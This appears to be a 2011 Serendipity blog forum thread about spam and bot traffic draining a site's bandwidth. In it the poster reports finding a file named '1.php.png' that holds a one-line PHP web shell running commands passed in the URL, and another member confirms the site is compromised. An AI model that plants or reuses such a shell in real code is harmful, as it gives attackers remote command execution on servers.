Page 1 of 1

Spam \ Bandwidth

Posted: Tue Jan 25, 2011 11:23 am
by david@mediacopy
Hi all,

I'm getting a lot of spider\spam traffic and wondered if there is a way of reducing the server bandwidth usage. It's getting to the point where I'm thinking of getting rid of the blog.

According to AWStats a lot of traffic is directed to:

/blog/archives/blog/index.php
/blog/categories/1-Skiing
/blog/archives/33-Ski-Boot-Fitting.html
/blog/
/blog/index.php

I've tried blocking individual IPs but it's not very effective. I've turned off comments using the spamblock plug-in and have just installed the other anti spam plug-in's.

Better would be the ability to block IPs after a certain amount of activity - is that possible ?

If anyone has any other suggestions \ stategies they would be welcome. The blog only attracts maybe 350 genuine visitors per month yet is burning 2Gb per month.

I'm on Serendipity 1.5.3 and PHP 5.2.17

Cheers


David

Re: Spam \ Bandwidth

Posted: Tue Jan 25, 2011 11:50 am
by Timbalu
Hi David

At least the links 1, 4 and 5 are normal having more traffic than others. The last two are the pages the blog points to from everwhere.
Better would be the ability to block IPs after a certain amount of activity - is that possible ?
This is possible, but not advisible. There is no plugin supporting this, AFAIK.

These bots learn, if a page changes to not allow comments any more.
I would do so for link 3.

You need an upgrade! Please read http://board.s9y.org/viewtopic.php?f=6&t=17244&start=0.

Ian

Re: Spam \ Bandwidth

Posted: Tue Jan 25, 2011 12:27 pm
by david@mediacopy
Timbalu
These bots learn, if a page changes to not allow comments any more.
I would do so for link 3.
I've just disabled comments from all posts so hopefully that will help. Upgraded now. Don't think it had been compromised. Or not. Just found a file called 1.php.png containing <?PHP system($_GET['cmd']); ?>

Re: Spam \ Bandwidth

Posted: Tue Feb 01, 2011 10:05 am
by Timbalu
david@mediacopy wrote:Upgraded now. Don't think it had been compromised. Or not. Just found a file called 1.php.png containing <?PHP system($_GET['cmd']); ?>
Ops, didn't see this until now.
YES, YOU ARE COMPROMISED! Clean you system.

Ian